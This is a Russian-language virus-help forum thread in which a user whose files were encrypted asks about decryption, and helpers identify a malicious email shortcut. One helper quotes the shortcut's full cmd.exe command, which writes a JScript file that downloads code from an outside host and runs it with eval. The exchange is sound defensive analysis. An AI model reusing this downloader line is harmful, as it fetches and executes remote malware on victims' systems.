Здравствуйте! Прежде чем обратиться за помощью, интересует вопрос возможна ли в принципе расшифровка?
[ATTACH=CONFIG]633742[/ATTACH][ATTACH=CONFIG]633743[/ATTACH]
Заранее спасибо!
Printable View
Здравствуйте! Прежде чем обратиться за помощью, интересует вопрос возможна ли в принципе расшифровка?
[ATTACH=CONFIG]633742[/ATTACH][ATTACH=CONFIG]633743[/ATTACH]
Заранее спасибо!
Уважаемый(ая) [B]Qsag[/B], спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="http://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Пришлите несколько зашифрованных файлов.
+ выполните [url]http://virusinfo.info/pravila.html[/url]
[url]https://yadi.sk/d/heKRHSPQsqvxZ[/url]
Зашифровались вчера?
Скрипт, который запустили перед шифрованием, сохранился?
Вчера.
Достоверно не известно, какие именно действия предшествовали зашифровке данных. Есть предположение, что письмо приведенное в скриншоте ниже и есть зловред, так как пользователю адресат не известен и подобного рода документ не ожидался.
[ATTACH=CONFIG]633752[/ATTACH]
Да, это он.
Заархивируйте с паролем virus (в имени архива не должно быть символов кириллицы) и пришлите по красной ссылке [color="Red"][u][b]Прислать запрошенный карантин[/b][/u][/color] [b]над первым сообщением[/b] темы.
Странные пользователи, конечно, которые открывают невесть что от [B]незнакомых[/B] адресатов
Возможно из за не хватки опыта с моей стороны, мне не удается добавить .lnk в avz и подготовить его для отправки. Что я делаю не так и возможно ли отправить его обычным .zip архивом?
Следовал ниже приведенной инструкции:
[ATTACH=CONFIG]633755[/ATTACH]
Так я и рассчитывал, что архивировать будете обычным архиватором :)
Ярлык имеет следующие путь
%windir%\system32\cmd.exe /c echo. 2>k.js&echo var l = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");l.open("GET","http://load-the-attach.com/scr/scr",false);l.send^(^);var p = l.responseText;eval^(p^);>k.js&k.js
[B]Рабочая папка[/B] %temp%
[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]
[QUOTE=thyrex;1389313]Так я и рассчитывал, что архивировать будете обычным архиватором :)[/QUOTE]
Залил )
Теперь ожидайте. Возможно сервер злодеев еще активен и удастся выудить ключ
Удастся помочь?
Увы, нет
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]1[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] \список документов для подтверждения трат_согласовано главным бухгалтером.doc_cdhn_doc_.lnk - [B]Trojan-Downloader.WinLNK.Small.w[/B][/LIST][/LIST]